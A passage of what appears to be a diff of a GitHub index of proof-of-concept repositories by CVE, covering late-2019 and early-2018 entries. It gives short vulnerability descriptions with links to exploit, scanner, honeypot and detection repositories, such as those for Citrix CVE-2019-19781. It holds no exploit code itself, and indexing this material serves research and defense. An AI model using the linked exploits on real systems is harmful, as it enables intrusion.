[shadowgatt/CVE-2019-19356](https://github.com/shadowgatt/CVE-2019-19356) +- [qq1515406085/CVE-2019-19356](https://github.com/qq1515406085/CVE-2019-19356) + +### CVE-2019-19369 +- [TheCyberGeek/CVE-2019-19369](https://github.com/TheCyberGeek/CVE-2019-19369) + +### CVE-2019-19383 (2019-12-03) + +freeFTPd 1.0.8 has a Post-Authentication Buffer Overflow via a crafted SIZE command (this is exploitable even if logging is disabled). + + +- [killvxk/CVE-2019-19383](https://github.com/killvxk/CVE-2019-19383) + +### CVE-2019-19393 (2020-10-01) + +The Web application on Rittal CMC PU III 7030.000 V3.00 V3.11.00_2 to V3.15.70_4 devices fails to sanitize user input on the system configurations page. This allows an attacker to backdoor the device with HTML and browser-interpreted content (such as JavaScript or other client-side scripts) as the content is always displayed after and before login. Persistent XSS allows an attacker to modify displayed content or to change the victim's information. Successful exploitation requires access to the web management interface, either with valid credentials or a hijacked session. + + +- [miguelhamal/CVE-2019-19393](https://github.com/miguelhamal/CVE-2019-19393) + +### CVE-2019-19447 (2019-12-08) + +In the Linux kernel 5.0.21, mounting a crafted ext4 filesystem image, performing some operations, and unmounting can lead to a use-after-free in ext4_put_super in fs/ext4/super.c, related to dump_orphan_list in fs/ext4/super.c. + + +- [Trinadh465/linux-4.19.72_CVE-2019-19447](https://github.com/Trinadh465/linux-4.19.72_CVE-2019-19447) + +### CVE-2019-19470 (2019-12-30) + +Unsafe usage of .NET deserialization in Named Pipe message processing allows privilege escalation to NT AUTHORITY\SYSTEM for a local attacker. Affected product is TinyWall, all versions up to and including 2.1.12. Fixed in version 2.1.13. + + +- [juliourena/CVE-2019-19470-RedTeamRD](https://github.com/juliourena/CVE-2019-19470-RedTeamRD) + +### CVE-2019-19492 (2019-12-02) + +FreeSWITCH 1.6.10 through 1.10.1 has a default password in event_socket.conf.xml. + + +- [Chocapikk/CVE-2019-19492](https://github.com/Chocapikk/CVE-2019-19492) +- [tucommenceapousser/CVE-2019-19492](https://github.com/tucommenceapousser/CVE-2019-19492) +- [tucommenceapousser/CVE-2019-19492-2](https://github.com/tucommenceapousser/CVE-2019-19492-2) + +### CVE-2019-19511 +- [jra89/CVE-2019-19511](https://github.com/jra89/CVE-2019-19511) + +### CVE-2019-19520 (2019-12-04) + +xlock in OpenBSD 6.6 allows local users to gain the privileges of the auth group by providing a LIBGL_DRIVERS_PATH environment variable, because xenocara/lib/mesa/src/loader/loader.c mishandles dlopen. + + +- [retrymp3/Openbsd-Privilege-Escalation](https://github.com/retrymp3/Openbsd-Privilege-Escalation) + +### CVE-2019-19547 (2020-01-13) + +Symantec Endpoint Detection and Response (SEDR), prior to 4.3.0, may be susceptible to a cross site scripting (XSS) issue. XSS is a type of issue that can enable attackers to inject client-side scripts into web pages viewed by other users. An XSS vulnerability may be used by attackers to potentially bypass access controls such as the same-origin policy. + + +- [nasbench/CVE-2019-19547](https://github.com/nasbench/CVE-2019-19547) + +### CVE-2019-19550 (2020-01-31) + +Remote Authentication Bypass in Senior Rubiweb 6.2.34.28 and 6.2.34.37 allows admin access to sensitive information of affected users using vulnerable versions. The attacker only needs to provide the correct URL. + + +- [underprotection/CVE-2019-19550](https://github.com/underprotection/CVE-2019-19550) +- [redteambrasil/CVE-2019-19550](https://github.com/redteambrasil/CVE-2019-19550) + +### CVE-2019-19576 (2019-12-04) + +class.upload.php in verot.net class.upload before 1.0.3 and 2.x before 2.0.4, as used in the K2 extension for Joomla! and other products, omits .phar from the set of dangerous file extensions. + + +- [jra89/CVE-2019-19576](https://github.com/jra89/CVE-2019-19576) + +### CVE-2019-19609 (2019-12-05) + +The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function. + + +- [ebadfd/CVE-2019-19609](https://github.com/ebadfd/CVE-2019-19609) +- [diego-tella/CVE-2019-19609-EXPLOIT](https://github.com/diego-tella/CVE-2019-19609-EXPLOIT) +- [guglia001/CVE-2019-19609](https://github.com/guglia001/CVE-2019-19609) +- [D3m0nicw0lf/CVE-2019-19609](https://github.com/D3m0nicw0lf/CVE-2019-19609) +- [n000xy/CVE-2019-19609-POC-Python](https://github.com/n000xy/CVE-2019-19609-POC-Python) +- [RamPanic/CVE-2019-19609-EXPLOIT](https://github.com/RamPanic/CVE-2019-19609-EXPLOIT) +- [glowbase/CVE-2019-19609](https://github.com/glowbase/CVE-2019-19609) + +### CVE-2019-19633 +- [jra89/CVE-2019-19633](https://github.com/jra89/CVE-2019-19633) + +### CVE-2019-19634 (2019-12-17) + +class.upload.php in verot.net class.upload through 1.0.3 and 2.x through 2.0.4, as used in the K2 extension for Joomla! and other products, omits .pht from the set of dangerous file extensions, a similar issue to CVE-2019-19576. + + +- [jra89/CVE-2019-19634](https://github.com/jra89/CVE-2019-19634) + +### CVE-2019-19651 +- [jra89/CVE-2019-19651](https://github.com/jra89/CVE-2019-19651) + +### CVE-2019-19652 +- [jra89/CVE-2019-19652](https://github.com/jra89/CVE-2019-19652) + +### CVE-2019-19653 +- [jra89/CVE-2019-19653](https://github.com/jra89/CVE-2019-19653) + +### CVE-2019-19654 +- [jra89/CVE-2019-19654](https://github.com/jra89/CVE-2019-19654) + +### CVE-2019-19658 +- [jra89/CVE-2019-19658](https://github.com/jra89/CVE-2019-19658) + +### CVE-2019-19699 (2020-04-06) + +There is Authenticated remote code execution in Centreon Infrastructure Monitoring Software through 19.10 via Pollers misconfiguration, leading to system compromise via apache crontab misconfiguration, This allows the apache user to modify an executable file executed by root at 22:30 every day. To exploit the vulnerability, someone must have Admin access to the Centreon Web Interface and create a custom main.php?p=60803&type=3 command. The user must then set the Pollers Post-Restart Command to this previously created command via the main.php?p=60901&o=c&server_id=1 URI. This is triggered via an export of the Poller Configuration. + + +- [SpengeSec/CVE-2019-19699](https://github.com/SpengeSec/CVE-2019-19699) + +### CVE-2019-19781 (2019-12-27) + +An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. + + +- [projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781) +- [trustedsec/cve-2019-19781](https://github.com/trustedsec/cve-2019-19781) +- [cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781) +- [jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781) +- [ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781) +- [mpgn/CVE-2019-19781](https://github.com/mpgn/CVE-2019-19781) +- [oways/CVE-2019-19781](https://github.com/oways/CVE-2019-19781) +- [becrevex/Citrix_CVE-2019-19781](https://github.com/becrevex/Citrix_CVE-2019-19781) +- [unknowndevice64/Exploits_CVE-2019-19781](https://github.com/unknowndevice64/Exploits_CVE-2019-19781) +- [haxrob/citrixmash_scanner](https://github.com/haxrob/citrixmash_scanner) +- [jamesjguthrie/Shitrix-CVE-2019-19781](https://github.com/jamesjguthrie/Shitrix-CVE-2019-19781) +- [haxrob/CVE-2019-19781](https://github.com/haxrob/CVE-2019-19781) +- [hollerith/CVE-2019-19781](https://github.com/hollerith/CVE-2019-19781) +- [aqhmal/CVE-2019-19781](https://github.com/aqhmal/CVE-2019-19781) +- [MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot) +- [mekhalleh/citrix_dir_traversal_rce](https://github.com/mekhalleh/citrix_dir_traversal_rce) +- [zenturacp/cve-2019-19781-web](https://github.com/zenturacp/cve-2019-19781-web) +- [zgelici/CVE-2019-19781-Checker](https://github.com/zgelici/CVE-2019-19781-Checker) +- [digitalshadows/CVE-2019-19781_IOCs](https://github.com/digitalshadows/CVE-2019-19781_IOCs) +- [onSec-fr/CVE-2019-19781-Forensic](https://github.com/onSec-fr/CVE-2019-19781-Forensic) +- [DanielWep/CVE-NetScalerFileSystemCheck](https://github.com/DanielWep/CVE-NetScalerFileSystemCheck) +- [Castaldio86/Detect-CVE-2019-19781](https://github.com/Castaldio86/Detect-CVE-2019-19781) +- [j81blog/ADC-19781](https://github.com/j81blog/ADC-19781) +- [b510/CVE-2019-19781](https://github.com/b510/CVE-2019-19781) +- [redscan/CVE-2019-19781](https://github.com/redscan/CVE-2019-19781) +- [digitalgangst/massCitrix](https://github.com/digitalgangst/massCitrix) +- [mandiant/ioc-scanner-CVE-2019-19781](https://github.com/mandiant/ioc-scanner-CVE-2019-19781) +- [citrix/ioc-scanner-CVE-2019-19781](https://github.com/citrix/ioc-scanner-CVE-2019-19781) +- [haxrob/citrix-honeypot](https://github.com/haxrob/citrix-honeypot) +- [L4r1k/CitrixNetscalerAnalysis](https://github.com/L4r1k/CitrixNetscalerAnalysis) +- [Azeemering/CVE-2019-19781-DFIR-Notes](https://github.com/Azeemering/CVE-2019-19781-DFIR-Notes) +- [0xams/citrixvulncheck](https://github.com/0xams/citrixvulncheck) +- [r4ulcl/CVE-2019-19781](https://github.com/r4ulcl/CVE-2019-19781) +- [nmanzi/webcvescanner](https://github.com/nmanzi/webcvescanner) +- [darren646/CVE-2019-19781POC](https://github.com/darren646/CVE-2019-19781POC) +- [Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201](https://github.com/Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201) +- [yukar1z0e/CVE-2019-19781](https://github.com/yukar1z0e/CVE-2019-19781) +- [SharpHack/CVE-2019-19781](https://github.com/SharpHack/CVE-2019-19781) +- [qiong-qi/CVE-2019-19781-poc](https://github.com/qiong-qi/CVE-2019-19781-poc) +- [w4fz5uck5/CVE-2019-19781-CitrixRCE](https://github.com/w4fz5uck5/CVE-2019-19781-CitrixRCE) +- [andripwn/CVE-2019-19781](https://github.com/andripwn/CVE-2019-19781) +- [VladRico/CVE-2019-19781](https://github.com/VladRico/CVE-2019-19781) +- [pwn3z/CVE-2019-19781-Citrix](https://github.com/pwn3z/CVE-2019-19781-Citrix) +- [Vulnmachines/Ctirix_RCE-CVE-2019-19781](https://github.com/Vulnmachines/Ctirix_RCE-CVE-2019-19781) +- [k-fire/CVE-2019-19781-exploit](https://github.com/k-fire/CVE-2019-19781-exploit) +- [zerobytesecure/CVE-2019-19781](https://github.com/zerobytesecure/CVE-2019-19781) +- [citrixgitoff/-ioc-scanner-CVE-2019-19781](https://github.com/citrixgitoff/-ioc-scanner-CVE-2019-19781) + +### CVE-2019-19782 (2019-12-13) + +The FTP client in AceaXe Plus 1.0 allows a buffer overflow via a long EHLO response from an FTP server. + + +- [Underwood12/CVE-2019-19782](https://github.com/Underwood12/CVE-2019-19782) + +### CVE-2019-19842 (2020-01-22) + +emfd in Ruckus Wireless Unleashed through 200.7.10.102.64 allows remote attackers to execute OS commands via a POST request with the attribute xcmd=spectra-analysis to admin/_cmdstat.jsp via the mac attribute. + + +- [bdunlap9/CVE-2019-19842](https://github.com/bdunlap9/CVE-2019-19842) + +### CVE-2019-19844 (2019-12-18) + +Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user's email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.) + + +- [ryu22e/django_cve_2019_19844_poc](https://github.com/ryu22e/django_cve_2019_19844_poc) +- [andripwn/django_cve201919844](https://github.com/andripwn/django_cve201919844) +- [0xsha/CVE_2019_19844](https://github.com/0xsha/CVE_2019_19844) + +### CVE-2019-19871 +- [VDISEC/CVE-2019-19871-AuditGuide](https://github.com/VDISEC/CVE-2019-19871-AuditGuide) + +### CVE-2019-19905 (2019-12-19) + +NetHack 3.6.x before 3.6.4 is prone to a buffer overflow vulnerability when reading very long lines from configuration files. This affects systems that have NetHack installed suid/sgid, and shared systems that allow users to upload their own configuration files. + + +- [dpmdpm2/CVE-2019-19905](https://github.com/dpmdpm2/CVE-2019-19905) + +### CVE-2019-19919 (2019-12-20) + +Versions of handlebars prior to 4.3.0 are vulnerable to Prototype Pollution leading to Remote Code Execution. Templates may alter an Object's __proto__ and __defineGetter__ properties, which may allow an attacker to execute arbitrary code through crafted payloads. + + +- [fazilbaig1/CVE-2019-19919](https://github.com/fazilbaig1/CVE-2019-19919) + +### CVE-2019-19945 (2020-03-16) + +uhttpd in OpenWrt through 18.06.5 and 19.x through 19.07.0-rc2 has an integer signedness error. This leads to out-of-bounds access to a heap buffer and a subsequent crash. It can be triggered with an HTTP POST request to a CGI script, specifying both "Transfer-Encoding: chunked" and a large negative Content-Length value. + + +- [delicateByte/CVE-2019-19945_Test](https://github.com/delicateByte/CVE-2019-19945_Test) + +### CVE-2019-20059 (2020-02-10) + +payment_manage.ajax.php and various *_manage.ajax.php in MFScripts YetiShare 3.5.2 through 4.5.4 directly insert values from the sSortDir_0 parameter into a SQL string. This allows an attacker to inject their own SQL and manipulate the query, typically extracting data from the database, aka SQL Injection. NOTE: this issue exists because of an incomplete fix for CVE-2019-19732. + + +- [cve-vuln/CVE-2019-20059](https://github.com/cve-vuln/CVE-2019-20059) + +### CVE-2019-20085 (2019-12-30) + +TVT NVMS-1000 devices allow GET /.. Directory Traversal + + +- [AleDiBen/NVMS1000-Exploit](https://github.com/AleDiBen/NVMS1000-Exploit) + +### CVE-2019-20197 (2019-12-31) + +In Nagios XI 5.6.9, an authenticated user is able to execute arbitrary OS commands via shell metacharacters in the id parameter to schedulereport.php, in the context of the web-server user account. + + +- [lp008/CVE-2019-20197](https://github.com/lp008/CVE-2019-20197) +- [jas502n/CVE-2019-20197](https://github.com/jas502n/CVE-2019-20197) + +### CVE-2019-20224 (2020-01-09) + +netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. This issue has been fixed in Pandora FMS 7.0 NG 742. + + +- [mhaskar/CVE-2019-20224](https://github.com/mhaskar/CVE-2019-20224) + +### CVE-2019-20326 (2020-03-16) + +A heap-based buffer overflow in _cairo_image_surface_create_from_jpeg() in extensions/cairo_io/cairo-image-surface-jpeg.c in GNOME gThumb before 3.8.3 and Linux Mint Pix before 2.4.5 allows attackers to cause a crash and potentially execute arbitrary code via a crafted JPEG file. + + +- [Fysac/CVE-2019-20326](https://github.com/Fysac/CVE-2019-20326) + +### CVE-2019-20361 (2020-01-08) + +There was a flaw in the WordPress plugin, Email Subscribers & Newsletters before 4.3.1, that allowed SQL statements to be passed to the database in the hash parameter (a blind SQL injection vulnerability). + + +- [jerrylewis9/CVE-2019-20361-EXPLOIT](https://github.com/jerrylewis9/CVE-2019-20361-EXPLOIT) + +### CVE-2019-20372 (2020-01-09) + +NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer. + + +- [vuongnv3389-sec/CVE-2019-20372](https://github.com/vuongnv3389-sec/CVE-2019-20372) +- [0xleft/CVE-2019-20372](https://github.com/0xleft/CVE-2019-20372) + +### CVE-2019-20933 (2020-11-19) + +InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). + + +- [LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) +- [Hydragyrum/CVE-2019-20933](https://github.com/Hydragyrum/CVE-2019-20933) + +### CVE-2019-25024 (2021-02-19) + +OpenRepeater (ORP) before 2.2 allows unauthenticated command injection via shell metacharacters in the functions/ajax_system.php post_service parameter. + + +- [codexlynx/CVE-2019-25024](https://github.com/codexlynx/CVE-2019-25024) + +### CVE-2019-25065 (2022-06-09) + +A vulnerability was found in OpenNetAdmin 18.1.1. It has been rated as critical. Affected by this issue is some unknown functionality. The manipulation leads to privilege escalation. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. + + +- [sagisar1/CVE-2019-25065-exploit](https://github.com/sagisar1/CVE-2019-25065-exploit) + +### CVE-2019-25137 (2023-05-18) + +Umbraco CMS 4.11.8 through 7.15.10, and 7.12.4, allows Remote Code Execution by authenticated administrators via msxsl:script in an xsltSelection to developer/Xslt/xsltVisualize.aspx. + + +- [Ickarah/CVE-2019-25137-Version-Research](https://github.com/Ickarah/CVE-2019-25137-Version-Research) + +### CVE-2019-48814 +- [wucj001/cve-2019-48814](https://github.com/wucj001/cve-2019-48814) + +### CVE-2019-1002101 (2019-04-01) + +The kubectl cp command allows copying files between containers and the user machine. To copy files from a container, Kubernetes creates a tar inside the container, copies it over the network, and kubectl unpacks it on the user’s machine. If the tar binary in the container is malicious, it could run any code and output unexpected, malicious results. An attacker could use this to write files to any path on the user’s machine when kubectl cp is called, limited only by the system permissions of the local user. The untar function can both create and follow symbolic links. The issue is resolved in kubectl v1.11.9, v1.12.7, v1.13.5, and v1.14.0. + + +- [brompwnie/CVE-2019-1002101-Helpers](https://github.com/brompwnie/CVE-2019-1002101-Helpers) + +### CVE-2019-1003000 (2019-01-22) + +A sandbox bypass vulnerability exists in Script Security Plugin 1.49 and earlier in src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java that allows attackers with the ability to provide sandboxed scripts to execute arbitrary code on the Jenkins master JVM. + + +- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development) +- [adamyordan/cve-2019-1003000-jenkins-rce-poc](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc) +- [slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins) +- [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION) +- [purple-WL/Jenkins_CVE-2019-1003000](https://github.com/purple-WL/Jenkins_CVE-2019-1003000) + +### CVE-2019-1010054 (2019-07-18) + +Dolibarr 7.0.0 is affected by: Cross Site Request Forgery (CSRF). The impact is: allow malitious html to change user password, disable users and disable password encryptation. The component is: Function User password change, user disable and password encryptation. The attack vector is: admin access malitious urls. + + +- [chaizeg/CSRF-breach](https://github.com/chaizeg/CSRF-breach) + +### CVE-2019-1010268 (2019-07-18) + +Ladon since 0.6.1 (since ebef0aae48af78c159b6fce81bc6f5e7e0ddb059) is affected by: XML External Entity (XXE). The impact is: Information Disclosure, reading files and reaching internal network endpoints. The component is: SOAP request handlers. For instance: https://bitbucket.org/jakobsg/ladon/src/42944fc012a3a48214791c120ee5619434505067/src/ladon/interfaces/soap.py#lines-688. The attack vector is: Send a specially crafted SOAP call. + + +- [Tonyynot14/CVE-2019-1010268](https://github.com/Tonyynot14/CVE-2019-1010268) + +### CVE-2019-1010298 (2019-07-15) + +Linaro/OP-TEE OP-TEE 3.3.0 and earlier is affected by: Buffer Overflow. The impact is: Code execution in the context of TEE core (kernel). The component is: optee_os. The fixed version is: 3.4.0 and later. + + +- [RKX1209/CVE-2019-1010298](https://github.com/RKX1209/CVE-2019-1010298) + +### CVE-2019-1020010 (2019-07-29) + +Misskey before 10.102.4 allows hijacking a user's token. + + +- [DXY0411/CVE-2019-1020010](https://github.com/DXY0411/CVE-2019-1020010) + ## 2018 +### CVE-2018-0101 (2018-01-29) + +A vulnerability in the Secure Sockets Layer (SSL) VPN functionality of the Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code. The vulnerability is due to an attempt to double free a region of memory when the webvpn feature is enabled on the Cisco ASA device. An attacker could exploit this vulnerability by sending multiple, crafted XML packets to a webvpn-configured interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system, or cause a reload of the affected device. This vulnerability affects Cisco ASA Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, ASA 1000V Cloud Firewall, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4110 Security Appliance, Firepower 9300 ASA Security Module, Firepower Threat Defense Software (FTD). Cisco Bug IDs: CSCvg35618. + + +- [1337g/CVE-2018-0101-DOS-POC](https://github.com/1337g/CVE-2018-0101-DOS-POC) +- [Cymmetria/ciscoasa_honeypot](https://github.com/Cymmetria/ciscoasa_honeypot) + +### CVE-2018-0114 (2018-01-04) + +A vulnerability in the Cisco node-jose open source library before 0.11.0 could allow an unauthenticated, remote attacker to re-sign tokens using a key that is embedded within the token. The vulnerability is due to node-jose following the JSON Web Signature (JWS) standard for JSON Web Tokens (JWTs). This standard specifies that a JSON Web Key (JWK) representing a public key can be embedded within the header of a JWS. This public key is then trusted for verification. An attacker could exploit this by forging valid JWS objects by removing the original signature, adding a new public key to the header, and then signing the object using the (attacker-owned) private key associated with the public key embedded in that JWS header. + + +- [zi0Black/POC-CVE-2018-0114](https://github.com/zi0Black/POC-CVE-2018-0114) +- [Logeirs/CVE-2018-0114](https://github.com/Logeirs/CVE-2018-0114) +- [adityathebe/POC-CVE-2018-0114](https://github.com/adityathebe/POC-CVE-2018-0114) +- [Eremiel/CVE-2018-0114](https://github.com/Eremiel/CVE-2018-0114) +- [Starry-lord/CVE-2018-0114](https://github.com/Starry-lord/CVE-2018-0114) +- [scumdestroy/CVE-2018-0114](https://github.com/scumdestroy/CVE-2018-0114) +- [j4k0m/CVE-2018-0114](https://github.com/j4k0m/CVE-2018-0114) +- [mmeza-developer/CVE-2018-0114](https://github.com/mmeza-developer/CVE-2018-0114) +- [Pandora-research/CVE-2018-0114-Exploit](https://github.com/Pandora-research/CVE-2018-0114-Exploit) +- [amr9k8/jwt-spoof-tool](https://github.com/amr9k8/jwt-spoof-tool) + +### CVE-2018-0171 (2018-03-28) + +A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, Causing an indefinite loop on the affected device that triggers a watchdog crash. Cisco Bug IDs: CSCvg76186. + + +- [AlrikRr/Cisco-Smart-Exploit](https://github.com/AlrikRr/Cisco-Smart-Exploit) + +### CVE-2018-0202 (2018-03-27) + +clamscan in ClamAV before 0.99.4 contains a vulnerability that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper input validation checking mechanisms when handling Portable Document Format (.pdf) files sent to an affected device. An unauthenticated, remote attacker could exploit this vulnerability by sending a crafted .pdf file to an affected device. This action could cause an out-of-bounds read when ClamAV scans the malicious file, allowing the attacker to cause a DoS condition. This concerns pdf_parse_array and pdf_parse_string in libclamav/pdfng.c. Cisco Bug IDs: CSCvh91380, CSCvh91400. + + +- [jaychowjingjie/CVE-2018-0202](https://github.com/jaychowjingjie/CVE-2018-0202) + +### CVE-2018-0208 (2018-03-08) + +A vulnerability in the web-based management interface of the (cloud based) Cisco Registered Envelope Service could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the affected service. The vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based management interface of the affected service. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information. Cisco Bug IDs: CSCvg74126. + + +- [dima5455/Cve-2018-0208](https://github.com/dima5455/Cve-2018-0208) + +### CVE-2018-0296 (2018-06-07) + +A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029. + + +- [milo2012/CVE-2018-0296](https://github.com/milo2012/CVE-2018-0296) +- [yassineaboukir/CVE-2018-0296](https://github.com/yassineaboukir/CVE-2018-0296) +- [bhenner1/CVE-2018-0296](https://github.com/bhenner1/CVE-2018-0296) +- [qiantu88/CVE-2018-0296](https://github.com/qiantu88/CVE-2018-0296) + +### CVE-2018-0708 (2018-07-16) + +Command injection vulnerability in networking of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands. + + +- [ntkernel0/CVE-2019-0708](https://github.com/ntkernel0/CVE-2019-0708) + +### CVE-2018-0798 (2018-01-10) + +Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allows a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". + + +- [Sunqiz/CVE-2018-0798-reproduction](https://github.com/Sunqiz/CVE-2018-0798-reproduction) + +### CVE-2018-0802 (2018-01-10) + +Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812. + + +- [zldww2011/CVE-2018-0802_POC](https://github.com/zldww2011/CVE-2018-0802_POC) +- [rxwx/CVE-2018-0802](https://github.com/rxwx/CVE-2018-0802) +- [Ridter/RTF_11882_0802](https://github.com/Ridter/RTF_11882_0802) +- [likekabin/CVE-2018-0802_CVE-2017-11882](https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882) +- [roninAPT/CVE-2018-0802](https://github.com/roninAPT/CVE-2018-0802) +- [Abdibimantara/Maldoc-Analysis](https://github.com/Abdibimantara/Maldoc-Analysis) + +### CVE-2018-0824 (2018-05-09) + +A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects, aka "Microsoft COM for Windows Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. + + +- [codewhitesec/UnmarshalPwn](https://github.com/codewhitesec/UnmarshalPwn) + +### CVE-2018-0834 (2018-02-15) + +Microsoft Edge and ChakraCore in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows remote code execution, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2018-0835, CVE-2018-0836, CVE-2018-0837, CVE-2018-0838, CVE-2018-0840, CVE-2018-0856, CVE-2018-0857, CVE-2018-0858, CVE-2018-0859, CVE-2018-0860, CVE-2018-0861, and CVE-2018-0866. + + +- [SpiralBL0CK/-CVE-2018-0834-aab-aar](https://github.com/SpiralBL0CK/-CVE-2018-0834-aab-aar) + +### CVE-2018-0886 (2018-03-14) + +The Credential Security Support Provider protocol (CredSSP) in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709 Windows Server 2016 and Windows Server, version 1709 allows a remote code execution vulnerability due to how CredSSP validates request during the authentication process, aka "CredSSP Remote Code Execution Vulnerability". + + +- [preempt/credssp](https://github.com/preempt/credssp) + +### CVE-2018-0952 (2018-08-15) + +An Elevation of Privilege vulnerability exists when Diagnostics Hub Standard Collector allows file creation in arbitrary locations, aka "Diagnostic Hub Standard Collector Elevation Of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Microsoft Visual Studio, Windows 10 Servers. + + +- [atredispartners/CVE-2018-0952-SystemCollector](https://github.com/atredispartners/CVE-2018-0952-SystemCollector) + +### CVE-2018-0959 (2018-05-09) + +A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka "Hyper-V Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. + + +- [pwndorei/CVE-2018-0959](https://github.com/pwndorei/CVE-2018-0959) + +### CVE-2018-14 +- [lckJack/legacySymfony](https://github.com/lckJack/legacySymfony) + +### CVE-2018-1010 (2018-04-12) + +A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka "Microsoft Graphics Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-1012, 